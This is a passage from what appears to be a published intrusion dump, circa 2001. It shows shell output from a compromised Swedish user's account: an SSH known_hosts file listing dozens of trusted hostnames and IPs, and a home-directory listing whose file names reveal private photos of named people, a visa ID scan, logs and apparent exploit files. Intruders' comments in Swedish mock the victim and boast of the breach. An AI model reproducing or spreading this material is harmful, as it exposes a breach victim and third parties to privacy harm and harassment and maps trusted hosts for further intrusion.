1364. total 123
1365. -rw-r--r-- 1 spacedmp spacedmp 334 Sep 6 2000 identity.pub
1366. -rw------- 1 spacedmp spacedmp 530 Sep 6 2000 identity
1367. drwxr-xr-x 2 spacedmp spacedmp 1024 Oct 20 2001 .
1368. -rw------- 1 spacedmp spacedmp 512 Oct 20 2001 random_seed
1369. -rw-r--r-- 1 spacedmp spacedmp 1663 Aug 7 10:24 authorized_keys
1370. -rw------- 1 spacedmp spacedmp 41725 Sep 20 09:32 known_hosts
1371. drwxrwx--x 167 spacedmp spacedmp 75776 Sep 22 22:50 ..
1372. $ cat known_hosts
1373. gosalyn.ced.chalmers.se 1024 35 151268403917718649882081152829065486043358572813676462221244838581488009668018883259815030194286947292034830350955135247480106213789589722219532161893822852791556816494078325957203917212699864296401711335670497522192692109587590299406450489604843542615765206899256517137115945667472210988874053903890991769553
1374. serverbox.free-hosting.nu 1024 37 134597990471742974707895288295197342031673600293964367163822327663827653734449319941393977749583113461411264815777302534393502530805021218588536469617083669299202568118179635567112930274168363178497648826177618378882091848810018000604799247223998803565855288531775183107482896633568714233615450730749464083089
1375. pucko.remedy.nu 1024 35 131615164213144470425074761948855039472420090466808230435056120628490849986772491928629537071035073133886603084946716159960194719546765158220522908862706763596358271876605852998947844089230656680791697530167204971184066256011041106908479903667075343702675011394891968264430300046239619508541974182293107456447
1376. 194.236.124.132 1024 33 161206773657465995167653167266007675180304456330077216222647192945308879014012703729891120896611820048255616303530605919118017545210641020425869773610971518864339379121346507261597510666163874003202631417433180707033207456863693689823000540652081405075335445736807320170300977530945514026503410451907070148213
1377. lamerz.net 1024 33 161206773657465995167653167266007675180304456330077216222647192945308879014012703729891120896611820048255616303530605919118017545210641020425869773610971518864339379121346507261597510666163874003202631417433180707033207456863693689823000540652081405075335445736807320170300977530945514026503410451907070148213
1378. 194.236.124.50 1024 33 106440909399036561174668454890244934945341998838416659842612393506364123390262355634611548420273452506699161141587318167082764466077386274093814956965983662369853850388883586743829340476321227576239452527607359128736714460996865566821719397974698451962043366965666650648028836320349534718392986036732378187223
1379. freebsd 1024 33 106440909399036561174668454890244934945341998838416659842612393506364123390262355634611548420273452506699161141587318167082764466077386274093814956965983662369853850388883586743829340476321227576239452527607359128736714460996865566821719397974698451962043366965666650648028836320349534718392986036732378187223
1380. fs01 1024 37 134673151523792009982979064108789575564945427532815915866834835533214395963664402378972587506042837947822104411772170834113755511426407333529503782061647439799257003674412977902749846210129915720453369054692577308442177034856123715982878707735848826768516968278925459776852644465892999220595654049921315882663
1381. 138.6.217.9 1024 33 115108939138063993061560223021272460052143911224539594694976637624133329732526387293052833760334304571220488685218117210600996213042424613105888561229992708962898121879989695640622207462668817200342608748398593645921543114836463971847973148559043516969030521487173704822891707334776162958713299564817096422373
1382. mail.krantz.pp.se 1024 37 135011172057041089136373399164064698898546616758827781781717961481860483004151552706143216896194778964030514696170025454685506922903823410328387316270481106163174758548565922019541025983027403581964400752679263811232667238295303549257426892770190876390506768135256182415104651335729007897838945015436354260863
1383. cinderella.krantz.pp.se 1024 37 130421086946384289988428900200147743458721813940728519338781963364282317832578315342606380347111425004069101548777156656385486065836274507965737367326852126749621710985783013696019897344554626084328640822064820912229966889562182564041465508467911840650401631018561169088321801816915107509598270324080610532889
1384. darkface.pp.se 1024 33 169080968056137498524203972835485980691586436083284108390517638264207770843540675988712702263518619516657506575115107946825001397597251586604752594767850921462811670127499444525006459868876599144723027352452723709611264352186197352429594355429842253945296045745184709818035994649383019487740966989387577500103
1385. 194.236.124.44 1024 33 156151763636703064972131629379441706363920933951421407832358295483686275516432154839031791654435442269657428529635221458758631634281241653884568570029564087038574636104194107272439305150123194472103548975986792043447918707499611200417706680171492795745570811730749529577367178917143439932529317161669394091443
1386. 194.236.124.49 1024 35 151731405636950241370576108878455140193213261930273497153187921454382081626961892019897948341809822948574452245675823228080535057316460235452245717491056171870729976611537759332063821938825159223198012666573140999001112297406197152645081876844834383263200391185869768598862253915497492900786067217237923955963
1387. 194.236.124.43 1024 37 118439828164747952241580655655004609564093003304896278175033142029698401584503244622694601145078487644463998540506251879590699623280404197799844501365192579042734347305855638344643547599092681479083916547703791633896733511966791065024020772166573074503848012211471213219739637281207141260742499665356150065431
1388. ricefarmer.bleh.nu 1024 37 151966743160981836112112099411167483704934911666154694002338692302599283356798650778091031977900851719176237504751758782478119151107407024448464054601979062945642792352912254976613693054442207441050938916441491441461792756391812905058039148851096501668040319767840835490360266604890251564373376057535291251909
1389. 195.58.127.131 1024 37 140574403009841793113966746999342228506648563741752138192246668378423285297871271599872889578452415390299515887270868890397219453618402610120892612769927015480227037448545824481167341057457534599838998654375299094647684941872984539561888277449553139797026247504731497668224744666582532769192307155825117130963
1390. new 1024 35 133312470361269667234165234511639086344664908731708444144543057289249464658831084265071513653947212108635308869833382024486517915754425526532683980030286284754219246036368377368152363699472298766300887141662203357088997493548669429374968367226684615772207594370780452625972805213004392904076073291672322933703
1391. linuxse.burken.nu 1024 37 158574042979264910595299408345879912995519197819718905134338437857177300224662096405286864807802160568423411497923543495798640578547017568480151583090765217373894484170070053844971314186500075537481258440994564646171340645630250357199922930200359085290653068756203683257914265818951597850249603677265484205863
1392. www.linux.se 1024 37 158574042979264910595299408345879912995519197819718905134338437857177300224662096405286864807802160568423411497923543495798640578547017568480151583090765217373894484170070053844971314186500075537481258440994564646171340645630250357199922930200359085290653068756203683257914265818951597850249603677265484205863
1393. linux.se 1024 37 158574042979264910595299408345879912995519197819718905134338437857177300224662096405286864807802160568423411497923543495798640578547017568480151583090765217373894484170070053844971314186500075537481258440994564646171340645630250357199922930200359085290653068756203683257914265818951597850249603677265484205863
1394. perrra.dyn.mirkkwar.nu 1024 37 137453207349046931314428046630191401605838152305527704078758799863320162626703970804927787478034430301285848715996177513583320548937699705395228852954281372184170108708112481495181049202127141964061950923747703075018738105715255313153822444088238646551849761966145395705245401633126996578739062289244384891479
1395. 217.78.33.46 1024 35 118157298531954640965896698179168201062198977069443840990896146940517470425712576168300280623574379110887261136704960690182912090936930628938701605792330583699074042830925709382601199225440417729177406576053753925098706373831525349950993826304919383989436407769713720925775314270441579513577320488325932169493
1396. ticket.remedy.nu 1024 35 118157298531954640965896698179168201062198977069443840990896146940517470425712576168300280623574379110887261136704960690182912090936930628938701605792330583699074042830925709382601199225440417729177406576053753925098706373831525349950993826304919383989436407769713720925775314270441579513577320488325932169493
1397. sekure.net 1024 37 131730438055444723801679576466736432066733310276900651863374391293053840076367442465405961675485952775646635875717831392171679978199662806044041198026598512044744246719523431448950131088450122390306488937177265059783863656377903055819674367455811067326607875901384251053390646246599629171476081918273602297767
1398. shuttle.krantz.pp.se 1024 35 142035628152859982327680120961274685368949944087137525733618248336126955476228561760096033832972479530491381383987742416921022823952941155331705755664705030391765448058393060029616059070116334685443904135446887128096972929917992350654389563006325873483338215682803841940602046573179117612349093466100508754347
1399. kib1.ki.sw.ericsson.se 1024 37 158704687540278596677855903890296536999454713058140680232826323978478010733272965027222301932877780645020411565138535407303063931666033348872466913238877090683912594295041577690307118068895310201707465904235420086578005437519611966661575107630650203324872135311374553429690413308646457997236211811444278494757
1400. kib7.ki.sw.ericsson.se 1024 35 104852542315026155191881191063643641508021960481612787287571115379642029895090333997015203061869121775394769678864463608835361786294457488286185707581291967954923901668250185389821989918542037550799975632901254645622174398887038992815434367857413452151704771711161370846492912391454558756546808876992747602497
1401. silence 1024 35 139491544500668523798350653194025859166736145542929098499495947917660936437603579972706503661136545046505505433891819960390337005021801768479247369010003542403899128828603716724491623078935136428066163778346533397153692230185405469961465365127721832163695155757568892233970111276729505155552876501304077580497
1402. petra.mds.mdh.se 1024 37 124719388884348581799284457414095137201335677716923991869742871029448411753569560903410260733658273253091199642525088089564747995133964912332244457857177837454699352275907091046296763921422647523061996444226623284914660015786399563435507427735861056474734150532703858219519642808242340577290966281180011095393
1403. irc.freebsd.nl 1024 37 143085723475127757219276887882946267947529077422380818669796524505762023054977214391615102688776838081898074490645508677303046002798887253693529925625309515016541308727869475272442066302030103413829388525434527618224810483786879074320086248333211087115484931130068705085448113562271487277810743465825835616247
1404. 213.242.136.103 1024 35 115007862614296366652372413719504901035879393921322627284981730537005169259924507902252121692176859444911590743919805435703419011514879152297994920979490305336076906649874377225436392780149089219870749273525014034004938642669795236010493949302706672905609300785896420140031440176728659583567073329531797393337
1405. mb.geek.se 1024 35 136221961276186357962321267553591838854784657845721493746417398060347567655507971332868405209545617746680496799238554833156279600104779305009852072138301184620086155854575978566260976099870971206823958516005555170582816496579278611057544711552001575965567657658250087336829838881052442817213936286016629887249
1406. lab.linux.se 1024 37 158574042979264910595299408345879912995519197819718905134338437857177300224662096405286864807802160568423411497923543495798640578547017568480151583090765217373894484170070053844971314186500075537481258440994564646171340645630250357199922930200359085290653068756203683257914265818951597850249603677265484205863
1407. geek.se 1024 37 158574042979264910595299408345879912995519197819718905134338437857177300224662096405286864807802160568423411497923543495798640578547017568480151583090765217373894484170070053844971314186500075537481258440994564646171340645630250357199922930200359085290653068756203683257914265818951597850249603677265484205863
1408. www.kantarell.nu 1024 35 113835508057579667641576616246491759756101604668998539163854822935679807384854505756538986146139870756007736699863628477271975452261854080548885104633632020033296009085532081813414262842254381211684709870692649718188684303524323382287371461501458073404693800082254034111831632069657178687795876106962346675313
1409. warez 1024 33 168151578264579140639696453178019738841809063112571996663912298218985713296408221853335115268160062262281374797843836493948217369130749728533115721721903399806241604580469229335000742846562828265405453401230514916705128731325658466058370410655791677481994254580601189829821100386246370876194934518807339978597
1410. fw 1024 35 142408778069536347830841840333642278628568929035810819049582757496663962381138170465552980391687006761465936577979077969110175815799101896012451653369979746915967680156574408893286831239790976910260103580995827666630628511839789031048867437040509576071863341544786884776908223248782981823147564962222545563179
1411. www.fetbandsbolaget.nu,194.236.124.207 1024 35 113835508057579667641576616246491759756101604668998539163854822935679807384854505756538986146139870756007736699863628477271975452261854080548885104633632020033296009085532081813414262842254381211684709870692649718188684303524323382287371461501458073404693800082254034111831632069657178687795876106962346675313
1412. chello-gw.krantz.pp.se,213.89.178.203 ssh-dss AAAAB3NzaC1kc3MAAACBAIhBjLqHWYd75MihhDXpAQ3Hk/2CnFT1iSOC5oT3HKMOtZ9jKDrxsE9rT2Z7nQYElcs10rVDcTI0vnQtjMpraKOt2p0z3KuCVzgtTc++V7kDaR9jGzG2Q21rZf7m/xGpjTWjaCpIPkrdG8c1UOnDtqRfaFKxQTAtoMuGU28FPG71AAAAFQDAEbuei1UUXphswCKJkmeACwhM4QAAAIEAgI/0dLn6LNpXlaGPwh4f4n2FwMgF+wLQEgyzAdFRJVVpg2bbmrNwcS+q9pKmTyqXQf6ffdYxSxYqyVlr9y2uq5Ypmw0VN8VeNfvEruRzl2py8e9OjmFktvaWSouewdWQwWai+MM6LjUvKjTnlTUKYgAhYL5UJHEc3DPgF+rFplwAAACABKht1GiC68WNWd4MJ7ciQ8tWkBXPovy6+vDFWiCpIhJceBMQPD0GHGivj/7vXm87/8w7MZO28pk2i/edeaqlskSNS3PgyDFDigzJLz3SPsk042vsjXKw9fLcbN5xvbVHa/a1RuQV/NL/oYghUBQ1Xzch507WBp1XhUb+ofTk5GQ=
1413. warez.spacedump.pp.se 1024 33 168151578264579140639696453178019738841809063112571996663912298218985713296408221853335115268160062262281374797843836493948217369130749728533115721721903399806241604580469229335000742846562828265405453401230514916705128731325658466058370410655791677481994254580601189829821100386246370876194934518807339978597
1414. web.remedy.nu,217.78.33.248 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAzODb4LqgNLJsq4yj2onHGgLxiVV5Fr7bk+Jw76/+AzpkJC1mWbSAJqb0FruxwXdt6zW8zd6nYx3ykcYzpwlU2bIKOAuK6FMXAJ9F7U5PYVPyWfNewkw58236hyamKqI4SBUvbjNhAJWZLkM6BGYKoKQ9FSRtmWQSW+FZpY3nMsM=
1415. bettan.linux.se ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAw/LVY6QiGIpCB2/fNObNXluJzzdsRX8feyQOpTtLd4KWPBoUZZVpRm0nkPIMcJhms0LVzK0RQWw/3J9J/vJpACQBMdqlIAcX1hmwW7zbABwoVlzMBGnVz/pqcUl9PsO8/pOB9ihgnKyOcrUItPyUhipU50cXYe62/paBBMAZ1N0=
1416. birdie.org,195.58.102.38 1024 35 139215770721134631165840435133246542936457575569832547840725449750787634902827510805681976255449193566376182605688384350599762552274373156442881725731427335168845280986403679841602825046856595717584181164849298517807180166919656766868865818731391748570862615951764710932219567500051207747687036301490908879839
1417. warez,194.236.124.48 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA0Oj0s6bGL/uXuSaUb9QGG1z3klcdivozVCBvMwe6wmGBTSuttwU7mMOhVEubqHiEVO0DsPzFXr8Sgjn94GmP5L8nQyRgkSkAxsvhM2r7RHCrP3uSZ82gB3zO8/AfzE0aQA1MokH5mA1GVJtlQ/+1la909aGfeSKXlLAHiZ8xzWE=
1418.  
1419.  
1420. #
1421. # Hgr_, Perrra, Sidewalk, Ahnberg, Chorus, #linux.se
1422. # Att s� m�nga litar p� en kille som �r s� tok�gd.
1423. # Och d� har vi �nd� editerat bort 3/4 av alla hosts.
1424. #
1425. # �r just DU drabbad/p�verkad av detta intr�nget?
1426. # St�d oss i kampanjen "passwd -l spacedmp" f�r att begr�nsa framtida skador!
1427. #
1428.  
1429.  
1430. $ cd ..
1431. $ ls
1432. zonefiles_klubba-tm.tar
1433. zones
1434. zones2
1435. -rw-r--r-- 1 spacedmp spacedmp 142061 Apr 25 2001 2001-04-02.zip
1436. -rw-r--r-- 1 spacedmp spacedmp 80781 Apr 25 2001 2001-04-11.zip
1437. -rw-r--r-- 1 spacedmp spacedmp 142487 Apr 25 2001 wxrd-1.0.tar.gz
1438. -rw-r--r-- 1 spacedmp spacedmp 121141 Apr 27 2001 libusb-0.1.3b.tar.gz
1439. -rw-r--r-- 1 spacedmp spacedmp 606938 Apr 27 2001 gphoto-2.0beta1.tar.gz
1440. -rw-r--r-- 1 spacedmp spacedmp 717554 Apr 27 2001 imlib-1.9.10.tar.gz
1441. -rw-r--r-- 1 spacedmp spacedmp 709336 Apr 27 2001 gphoto-0.4.3.tar.gz
1442. -rw-r--r-- 1 spacedmp spacedmp 143744 Apr 27 2001 screen.jpg
1443. -rw-r--r-- 1 spacedmp spacedmp 164471 Apr 29 2001 autolice.gz
1444. -rw-r--r-- 1 spacedmp spacedmp 329 Apr 30 2001 .mime.types
1445. -rw-r--r-- 1 spacedmp spacedmp 288 Apr 30 2001 .mailcap
1446. -rw-r--r-- 1 spacedmp spacedmp 2023307 May 1 2001 kvirc-2.1.1.tar.gz
1447. -rw-r--r-- 1 spacedmp spacedmp 8664303 May 1 2001 qt-x11-2.3.0.tar.gz
1448. drwxr-xr-x 5 spacedmp spacedmp 1024 May 1 2001 kvirc-2.1.1
1449. drwxr-xr-x 2 root root 1024 May 1 2001 geda-dl
1450. drwxr-xr-x 10 spacedmp spacedmp 1024 May 1 2001 geda
1451. -rw------- 1 spacedmp spacedmp 323 May 2 2001 gschem.log
1452. -rw-r--r-- 1 spacedmp spacedmp 140274 May 3 2001 micq-0.4.6-p4.tgz
1453. drwx------ 2 spacedmp spacedmp 1024 May 3 2001 help
1454. -rw-r--r-- 1 spacedmp spacedmp 3715 May 4 2001 Unit1.dcu
1455. -rw-r--r-- 1 spacedmp spacedmp 3351 May 4 2001 Unit3.dcu
1456. -rw-r--r-- 1 spacedmp spacedmp 3351 May 4 2001 Unit2.dcu
1457. -rwxr-xr-x 1 spacedmp spacedmp 419284 May 4 2001 Project1
1458. drwxr-xr-x 2 spacedmp spacedmp 1024 May 4 2001 mentor
1459. drwxr-xr-x 3 spacedmp spacedmp 1024 May 4 2001 edwin
1460. drwxr-xr-x 2 spacedmp spacedmp 1024 May 6 2001 spec
1461. drwxr-xr-x 2 spacedmp spacedmp 1024 May 9 2001 Telia
1462. -rw-r--r-- 1 spacedmp spacedmp 1104 May 9 2001 strip.gif
1463. -rw-r--r-- 1 spacedmp spacedmp 189894 May 17 2001 Johanna_sofia.bmp
1464. -rw-r--r-- 1 spacedmp spacedmp 131598 May 17 2001 Tess_Johanna.bmp
1465. -rw-r--r-- 1 spacedmp spacedmp 429634 May 17 2001 bild01.bmp
1466. -rw-r--r-- 1 spacedmp spacedmp 496453 May 18 2001 cd00002.jpg
1467. -rw-r--r-- 1 spacedmp spacedmp 484 May 18 2001 drabant
1468. -rw-r--r-- 1 spacedmp spacedmp 125190 May 19 2001 w3cam-0.6.6.tar.gz
1469. drwxr-xr-x 5 spacedmp spacedmp 1024 May 19 2001 cam
1470. -rw-r--r-- 1 spacedmp spacedmp 677 May 19 2001 konton
1471. -rw-r--r-- 1 spacedmp spacedmp 16448 May 23 2001 sms-libmodem.tgz
1472. -rw-r--r-- 1 spacedmp spacedmp 40021 May 23 2001 libmodem-1.3.tar.gz
1473. drwxr-xr-x 4 spacedmp spacedmp 1024 May 23 2001 lib
1474. -rw-r--r-- 1 spacedmp spacedmp 200 May 23 2001 gardin
1475. drwx------ 4 spacedmp spacedmp 1024 May 23 2001 .opera
1476. -rw-r--r-- 1 spacedmp spacedmp 35 May 23 2001 minicom.log
1477. -rw------- 1 spacedmp spacedmp 36 May 24 2001 sites
1478. -rw-r--r-- 1 spacedmp spacedmp 5835104 May 24 2001 samba-latest.tar.gz
1479. -rw-r--r-- 1 spacedmp spacedmp 14 May 24 2001 dell
1480. -rw-r--r-- 1 spacedmp spacedmp 409976 May 24 2001 remedy.db
1481. -rw-r--r-- 1 spacedmp spacedmp 1298109 May 27 2001 glftpd-lnx_1.23.tgz
1482. -rw-r--r-- 1 spacedmp spacedmp 5433806 May 27 2001 driving.mp3
1483. -rw-r--r-- 1 spacedmp spacedmp 114 May 28 2001 stuff-that-I-need
1484. -rw-r--r-- 1 spacedmp spacedmp 15360 May 29 2001 shellkonto-2.xls
1485. -rw-r--r-- 1 spacedmp spacedmp 1941676 May 29 2001 gnupg-1.0.6.tar.gz
1486. drwxr-xr-x 3 spacedmp spacedmp 1024 May 31 2001 djdjd
1487. -rw------- 1 spacedmp spacedmp 79 May 31 2001 ircd
1488. -rw-r--r-- 1 spacedmp spacedmp 5538731 Jun 2 2001 Cyanide-Angel_astray-01-Revelation_of_my_supremacy.mp3
1489. -rw-r--r-- 1 spacedmp spacedmp 6613917 Jun 2 2001 Cyanide-Angel_astray-02-Angel_astray.mp3
1490. -r-------- 1 spacedmp spacedmp 210 Jun 2 2001 free-mall
1491. -rw-r--r-- 1 spacedmp spacedmp 311 Jun 2 2001 linuxse-freehosting
1492. -rwxr-xr-x 1 spacedmp spacedmp 242 Jun 2 2001 makehost
1493. drwxr-xr-x 3 spacedmp spacedmp 1024 Jun 3 2001 ggjg
1494. -rw-r--r-- 1 spacedmp spacedmp 27 Jun 3 2001 .kvirc-2.1.1.rc
1495. -rw-r--r-- 1 spacedmp spacedmp 2044 Jun 3 2001 test.c
1496. -rw------- 1 spacedmp spacedmp 46 Jun 3 2001 .wmpinboarddata
1497. -rw-r--r-- 1 spacedmp spacedmp 1174579 Jun 4 2001 FLUSWEp22-35.pdf
1498. -rw-r--r-- 1 spacedmp spacedmp 417814 Jun 4 2001 FLUSWEp42-47.pdf
1499. -rw-r--r-- 1 spacedmp spacedmp 331 Jun 8 2001 files
1500. -rw-r--r-- 1 spacedmp spacedmp 7391823 Jun 9 2001 fonts.tgz
1501. -rw-r--r-- 1 spacedmp spacedmp 1927 Jun 10 2001 .acrorc
1502. -rw-r--r-- 1 spacedmp spacedmp 125 Jun 10 2001 g�vle-f�rslag
1503. -rw-r--r-- 1 spacedmp spacedmp 149 Jun 11 2001 pluttan
1504. -rw-r--r-- 1 spacedmp spacedmp 1973923 Jun 12 2001 mutt-1.2.5i.tar.gz
1505. drwx------ 2 spacedmp spacedmp 1024 Jun 12 2001 Mail
1506. -rw-r--r-- 1 spacedmp spacedmp 434 Jun 12 2001 .muttrc
1507. -rw-r--r-- 1 spacedmp spacedmp 52483 Jun 13 2001 unrar-2.50.tar.gz
1508. -rw-r--r-- 1 spacedmp spacedmp 20310 Jun 13 2001 rational_server_perm.dat
1509. -rw-r--r-- 1 spacedmp spacedmp 88802 Jun 17 2001 mozilla-i686-pc-linux-gnu-0.9.1-installer.tar.gz
1510. -rw-r--r-- 1 spacedmp spacedmp 51470 Jun 17 2001 fweb10.jpg
1511. drwxr-xr-x 3 spacedmp spacedmp 1024 Jun 17 2001 .mozilla
1512. drwxr-xr-x 3 spacedmp spacedmp 1024 Jun 17 2001 .fullcircle
1513. -rw-r--r-- 1 spacedmp spacedmp 410 Jun 17 2001 moz-env
1514. drwxr-xr-x 17 spacedmp spacedmp 1024 Jun 17 2001 .gimp-1.2
1515. -rw-r--r-- 1 spacedmp spacedmp 11 Jun 18 2001 eva-tidaholm
1516. drwxr-xr-x 2 spacedmp spacedmp 20480 Jun 18 2001 picsdl
1517. -rw-r--r-- 1 spacedmp spacedmp 3001 Jun 19 2001 IrcLog.#Sverige
1518. -rw-r--r-- 1 spacedmp spacedmp 1542 Jun 22 2001 fake
1519. -rw-r--r-- 1 spacedmp spacedmp 106 Jun 27 2001 ohms
1520. -r-------- 1 spacedmp spacedmp 5 Jun 28 2001 sd-test
1521. -rw-r--r-- 1 spacedmp spacedmp 28277649 Jun 30 2001 pics.tar.gz
1522. -rw-r--r-- 1 spacedmp spacedmp 147 Jun 30 2001 opers.irc.linux.se.mlist
1523. -rw-r--r-- 1 spacedmp spacedmp 201 Jul 1 2001 UV
1524. -rw-r--r-- 1 spacedmp spacedmp 113506 Jul 4 2001 sd-visa-id.jpg
1525. -rw----r-- 1 spacedmp spacedmp 3579 Jul 6 2001 2219.c
1526. -rwxr-xr-x 1 spacedmp spacedmp 14418 Jul 6 2001 2219
1527. -rwxr-xr-x 1 spacedmp spacedmp 14418 Jul 6 2001 ex
1528. -rwxr-xr-x 1 spacedmp spacedmp 565541 Jul 7 2001 dsc00421.jpg
1529. -rw-r--r-- 1 spacedmp spacedmp 1412638 Jul 7 2001 krb4-1.0.8.tar.gz
1530. -rw-r--r-- 1 spacedmp spacedmp 1890304 Jul 8 2001 BamseSaga1.mp3
1531. -rw-r--r-- 1 spacedmp spacedmp 258611200 Jul 8 2001 firewall-backup.tar
1532. drwxr-xr-x 3 spacedmp spacedmp 1024 Jul 9 2001 removed-pics
1533. -rw-r--r-- 1 spacedmp spacedmp 659759 Jul 9 2001 ScrollZ-1.8l.tar.gz
1534. -rw-r--r-- 1 spacedmp spacedmp 15762 Jul 10 2001 Johanna2.jpg
1535. -rw-r--r-- 1 spacedmp spacedmp 3229698 Jul 10 2001 Jimi_Hendrix_-_Foxy_Lady.mp3
1536. -rw------- 1 spacedmp spacedmp 13644979 Jul 11 2001 irc.log.gz
1537. drwxr-xr-x 2 spacedmp spacedmp 1024 Jul 13 2001 patches
1538. drwx------ 5 spacedmp spacedmp 1024 Jul 14 2001 .netscape
1539. -rw-r--r-- 1 spacedmp spacedmp 23 Jul 18 2001 lunarstorm
1540. -rw-r--r-- 1 spacedmp spacedmp 700012 Jul 20 2001 asn.txt
1541. -rw-r--r-- 1 spacedmp spacedmp 13672 Jul 20 2001 as2.png
1542. -rw-r--r-- 1 spacedmp spacedmp 17215 Jul 20 2001 as1.png
1543. -rw-r--r-- 1 spacedmp spacedmp 10 Jul 20 2001 bokning
1544. drwxr-xr-x 2 spacedmp spacedmp 1024 Jul 22 2001 jupe
1545. -rw-r--r-- 1 spacedmp spacedmp 10390 Jul 23 2001 cidr.c
1546. -rw------- 1 spacedmp spacedmp 1537 Jul 24 2001 se-opers.log
1547. -rw-r--r-- 1 spacedmp spacedmp 3634 Jul 25 2001 jupe.tar.gz
1548. -rw------- 1 spacedmp spacedmp 50362 Jul 25 2001 nisse.log.old
1549. -rw-r--r-- 1 spacedmp spacedmp 9647 Jul 26 2001 ume.to.log
1550. -rw-r--r-- 1 spacedmp spacedmp 0 Jul 27 2001 .signature
1551. -rw-r--r-- 1 spacedmp spacedmp 12359788 Jul 28 2001 x-stilletto_heels.zip
1552. drwxr-xr-x 2 spacedmp spacedmp 5120 Jul 28 2001 pornpics
1553. -rw-r--r-- 1 spacedmp spacedmp 659759 Jul 28 2001 ScrollZ-1.8l.tar.gz.1
1554. -rw-r--r-- 1 spacedmp spacedmp 305 Jul 30 2001 ircnet.lusers
1555. -rw-r--r-- 1 spacedmp spacedmp 489 Jul 30 2001 efnet.lusers
1556. -rw-r--r-- 1 spacedmp spacedmp 25096 Aug 1 2001 tcptraceroute-1.2.tar.gz
1557. -rw-r--r-- 1 spacedmp spacedmp 25300 Aug 1 2001 stealth.grep
1558. -rwxr-xr-x 1 root root 38476 Aug 2 2001 htpasswd
1559. -rwxr-xr-x 1 spacedmp spacedmp 6420632 Aug 2 2001 200108011008996653575.sql.bz2
1560. -rw-r--r-- 1 spacedmp spacedmp 19 Aug 3 2001 url
1561. -rw-r--r-- 1 spacedmp spacedmp 135 Aug 3 2001 irc.swipnet.se
1562. drwxr-xr-x 2 spacedmp spacedmp 1024 Aug 12 2001 burken.nu
1563. -rwxr--r-- 1 spacedmp spacedmp 12288 Aug 18 2001 shell-20010704-20010810.xls
1564. -rw-r--r-- 1 spacedmp spacedmp 753 Aug 19 2001 burken.nu-nmap.log
1565. -rw------- 1 spacedmp spacedmp 3201 Aug 19 2001 .micqrc
1566. -rw-r--r-- 1 spacedmp spacedmp 238 Sep 26 2001 spar
1567. -rw-r--r-- 1 spacedmp spacedmp 26937 Sep 29 2001 graphical.zip
1568. -rw-r--r-- 1 spacedmp spacedmp 132257 Oct 1 2001 jolli_tuttar.jpg
1569. -rw-r--r-- 1 spacedmp spacedmp 301428 Oct 7 2001 sanna_sover2.JPG
1570. -rw-r--r-- 1 spacedmp spacedmp 13380 Oct 7 2001 sanna_sover.JPG
1571. drwxr-xr-x 2 spacedmp spacedmp 1024 Oct 8 2001 net
1572. -rw-rw-r-- 1 spacedmp spacedmp 1244286 Oct 9 2001 cap002.bmp
1573. -rw-r--r-- 1 spacedmp spacedmp 3755168 Oct 12 2001 Eldkvarn_-_K�rlekens_Tunga.mp3
1574. -rw-r--r-- 1 spacedmp spacedmp 49 Oct 13 2001 .packages
1575. -rw-r--r-- 1 spacedmp spacedmp 562 Oct 14 2001 buildgraphs.sh
1576. -rw-r--r-- 1 spacedmp spacedmp 2338 Oct 14 2001 fs02load.png
1577. -rw-r--r-- 1 spacedmp spacedmp 634 Oct 14 2001 mailstats
1578. -rw-r--r-- 1 spacedmp spacedmp 854153 Oct 15 2001 nmap-2.54BETA30.tgz
1579. -rw-r--r-- 1 spacedmp spacedmp 7582 Oct 15 2001 natverk1.txt
1580. -rw-r--r-- 1 spacedmp spacedmp 19603 Oct 15 2001 mysql.dump
1581. -rw-r--r-- 1 spacedmp spacedmp 22 Oct 19 2001 ericsson
1582. drwxr-xr-x 7 spacedmp spacedmp 1024 Oct 19 2001 porno
1583. -rw-r--r-- 1 spacedmp spacedmp 671722 Oct 20 2001 irc2.10.3p3.tgz
1584. drwxr-xr-x 2 spacedmp spacedmp 1024 Oct 20 2001 .ssh
1585. -r-------- 1 spacedmp spacedmp 125 Oct 21 2001 warez
1586. -rw-r--r-- 1 spacedmp spacedmp 176933 Oct 21 2001 LEX7.JPG
1587. -rw-r--r-- 1 spacedmp spacedmp 188678 Oct 21 2001 lex-n�rbild.JPG
1588. -rw-r--r-- 1 spacedmp spacedmp 141391 Oct 21 2001 LEX6.JPG
1589. -rw-r--r-- 1 spacedmp spacedmp 155575 Oct 21 2001 LEX5.JPG
1590. -rw-r--r-- 1 spacedmp spacedmp 178142 Oct 21 2001 lexochsladden.JPG
1591. -rw-r--r-- 1 spacedmp spacedmp 251443 Oct 21 2001 LEX3.JPG
1592. -rw-r--r-- 1 spacedmp spacedmp 326972 Oct 21 2001 LEX4.JPG
1593. -rw-r--r-- 1 spacedmp spacedmp 152896 Oct 21 2001 lex_i_luften.JPG
1594. -rw-r--r-- 1 spacedmp spacedmp 282558 Oct 21 2001 LEX1.JPG
1595. -rw-r--r-- 1 spacedmp spacedmp 150965 Oct 21 2001 lex_o_disktrasan.JPG
1596. -rw-r--r-- 1 spacedmp spacedmp 160200 Oct 21 2001 lex_o_siemens.JPG
1597. -rw-r--r-- 1 spacedmp spacedmp 176153 Oct 21 2001 lex_i_s�ngen.JPG
1598. -rw-r--r-- 1 spacedmp spacedmp 165986 Oct 21 2001 lex_tittar_ner.JPG
1599. -rw-r--r-- 1 spacedmp spacedmp 195964 Oct 21 2001 lex_o_sladden.JPG
1600. -rw-r--r-- 1 spacedmp spacedmp 219589 Oct 21 2001 lex_ser_kul_ut.JPG
1601. -rw-r--r-- 1 spacedmp spacedmp 58726 Oct 21 2001 BADRUM.JPG
1602. -rw-r--r-- 1 spacedmp spacedmp 154614 Oct 21 2001 BADRUM2.JPG
1603. -rw-r--r-- 1 spacedmp spacedmp 207511 Oct 21 2001 lex_i_fot�ljen.JPG
1604. -rw-r--r-- 1 spacedmp spacedmp 150018 Oct 21 2001 08-jolli.jpg
1605. -rw-r--r-- 1 spacedmp spacedmp 178690 Oct 21 2001 12-jolli.jpg
1606. -rw-r--r-- 1 spacedmp spacedmp 7744 Oct 21 2001 Sanna.jpg
1607. -rw-r--r-- 1 spacedmp spacedmp 51 Oct 22 2001 funet
1608. drwxr-xr-x 2 spacedmp spacedmp 1024 Oct 22 2001 wap
1609. -rw-r--r-- 1 spacedmp spacedmp 35074 Oct 25 2001 lex_bord2.JPG
1610. -rw-r--r-- 1 spacedmp spacedmp 120611 Oct 25 2001 lex_i_famnen.JPG
